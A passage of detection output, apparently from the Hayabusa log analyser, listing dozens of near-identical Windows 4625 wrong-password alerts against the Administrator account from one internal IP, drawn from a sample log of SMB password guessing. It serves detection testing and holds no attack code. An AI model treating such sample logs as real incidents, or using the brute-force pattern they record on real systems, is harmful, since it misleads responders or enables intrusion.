+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: 
